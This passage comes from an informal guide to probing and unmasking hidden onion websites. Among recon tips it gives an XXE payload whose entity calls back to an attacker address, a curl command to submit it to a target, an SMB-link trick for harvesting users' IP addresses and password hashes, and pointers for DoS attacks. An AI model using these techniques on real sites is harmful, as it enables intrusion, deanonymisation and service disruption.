If you find some sort of API (maybe referenced to in javascript, maybe you just found a path like /v1/ or /api) you can brute force the url with a wordlist specifically made for APIs. If you're lucky it'll be obvious how to get it to work, since the average API is a ball of interesting information that, if you poke it correctly, will spew out really irrelevant details about something.
A lot of sites have apis somewhere. Even darknet sites usually document their API and will provide it to interested parties. Lastly, APIs almost always provide a lot more information than a normal webpage.


- Other loot

The whole point of mapping a website like that is you'll inevitably find something useful or interesting. See what you'll find! Some example unexpected finds could be:
- outdated contact info
- test scripts of various sorts
- admin/manager interfaces
- directories like "database" or "backup"
- things that might be willing to email you


--== Misc Exploits/Misconfigurations/Tools

- Status Pages and Similar Mistakes

Most webservers have a built in status page that's almost never configured to be accessable from the internet. The status page lists off everything that's connected to that daemon. Someone has to have screwed up pretty badly if it's a hidden site and has one of these urls. It doesn't hurt to check though, try /status for nginx and /server-status for apache. In general I like to eventually run Nikto on sites I'm working on because Nikto usually checks for things status pages that I've forgotten. It's otherwise not incredibly useful. Onionscan will also check for status pages.
It's not a bad idea to try http://sitehere/cpanel or /whm - these URLs are supposed to redirect to the hostname of the server and a port aroudn 2082-2084.


- Wordpress upload directory

Every wordpress site has a directory called https://sitename.com/wp-content/uploads. If you can look into it it's not that unusual to find various backup files of the site. There's a tool tcalled wpscan (which used to be free) which has a database of wordpress plugin exploits. You have to pay for it now unfortunately, it sounds incredibly boring to maintain and I'm not surprised they want money for it. If you can figure out the software a site is using there might be other scanners or known exploits for it. For a cloudflare site, try https://builtwith.com to identify the website software.


- changelog.txt

A lot of sites original software leaves changelog.txt sitting around. Even if it doesn't say the version of the software you can generally search around for the commit id (its a big hexidecimal string). Wordpress leaves a readme.html file sitting around instead.


- Google Image Search

Google image search can search for pictures based on what they look like rather than anything about the actual file. You can't do this from your cellphone. Go to images.google.com, click the black camera icon, and upload the picture you'd like to find online.


- Burp Collaborator Everywhere plugin

Someone at Portswigger wrote a plugin called "Collaborator Everywhere" that's specifically for hidden sites. I only found it yesterday. If you don't have the non-pirated version of burp that lets you load extensions then don't spend the money. The paper is here: https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface
Basically you enable this plugin and open the Collaborator tool, and the plugin sticks a malicious dns address into every http field and script parameter it finds as you browse through the site (when it's in proxy mode). I had some problems with this plugin, both with it not loading after the first time I installed it, and with collaborator mis-figuring out my ip address due to all the socks proxies and stuff. Considering it was written for unmasking sites I figured I'd include it despite never having seen it be successful.

Related urls:
https://digitalforensicstips.com/2017/11/using-burp-suites-collaborator-to-find-the-true-ip-address-for-a-onion-hidden-service/


- XML input forms

XML forms occasionally allow for what's called XXE (External Entity Attack). I don't think you usually have to have valid parameters since it takes advantage of the document specification features built into the xml standard and old versions of libxml. I've never found a form vulnerable to this but I honestly haven't looked.
This functionality exists so that XML can be extensible into other document types, which you define under DOCTYPE. There's a variation on this attack that is a denial of service attack called the "Billion Laughs Attack" that's worth looking up if you're into crashing things.
You should either try submittingg XXE-POST-body.txt on it's own or appended to the front of an XML form. A few things (like MS Sharepoint servers) will accept XML input for forms that also accept multipart-form submissions, but I have no idea if they've ever been vulnerable. I'm told it's worth trying to change the mime-type to XML and submit something like the following:

----- XXE-POST-body.txt -----
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "http://youripaddresshere/">]>
<foo>&xxe;</foo>
-----

Just like with the wordpress exploit, you can save yourself having to manually construct a http(s) request using curl. Start a listener on port 80 first obviously.

Example:
curl -k -i -X POST http://target-site-here/api/v2/submit -H "Content-Type: application/xml" -H "Accept: application/xml" --data "@XXE-POST-body.txt"

Point this at a netcat listener if you want to see the full request.
This functionality exists so that XML can be extensible into other document types, which you define under DOCTYPE. There's a variation on this attack that is a denial of service attack called the "Billion Laughs Attack" that's worth looking up if you're into crashing things. It's one of those fundamental stupid decisions, like the AWS metadata service handling credentials or Windows automatically resolving smb shares.


- IP addresses and hostnames in output

It's not that uncommon to find all sorts of interesting things in a website if you can just grep through the output. Apparently you can make burp make a log of traffic that you can then use grep commands on (https://www.reddit.com/r/AskNetsec/comments/k6ak9s/easy_way_of_making_burp_note_ip_addresses/). Examples of stuff to find are valid ip addresses, urls, subdomains, email addresses, usernames, full filesystem paths to things, error messages, etc.
As an alternative to burp you can always try web-wacking the site (recursively downloading it's contents as html) and then grepping the output of that.

Download the site recursively:
wget -r -l 3 http://somesite.com

Useful grep commands:
grep -Hri '@' ./somesite.com/*
Or the ip address grep:
grep -Hr -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" ./somesite.com/*
Compare two versions of the site easily:
diff -r ./somesite.com/ ./somesite.com.old/

If you try this you'll notice that wget gets caught in loops all the time. It's one of the better tools for downloading a static copy of the site too. Diff -r compares directories, so if you downloaded the site the same way both times it might tell you what's changed.


- Google dorking for stuff

it's always worth searching a website in google or yandex with stuff like microsoft documents and backup files:
(in google) site:somewebsite filetype:sql

Other file formats: mdb (microsoft database), doc, docx, xml, zip, bak, txt, pdf, ppt, myd/myi, tar.gz, tgz
Useful google commands are inurl: intitle: 00..99 (range of numbers) and stuff like that.


- End User Attacks

I pretty much never try to attack end users because I know very little about windows. The non-fictional book "Kingpin" is worth reading and the real life protagonist used almost entirely client side attacks. There's a really ugly and large number of ways you can execute code via any MS Office product. Additionally, some applications and document formats are prone to connecting outwards when a valid SMB URI is encountered. An example is there was a recent Zoom (video chat software) exploit where if you put a link like //1.2.3.4/share/foo.txt into chat it'd make it a blue URL, and anyone that clicked it would be forwarding their both their ip address and encrypted password to you.


- DoS attacks

I usually don't DoS stuff, but the actual tor node that forwards to the hidden service is known to be a weak link, especially for people using older versions of tor. There was a lot of discussion on Dread around a year ago regarding ways of configuring tor to withstand the impact of trying to overload it with circuits, so if you're defending a site you might want to read up.
In addition tons of standard website software have easy to stress out urls, like php files intended to be executed by cronjobs (*cron.php) and search features, especially ones that allow for wildcards.

Tool:
https://github.com/k4m4/onioff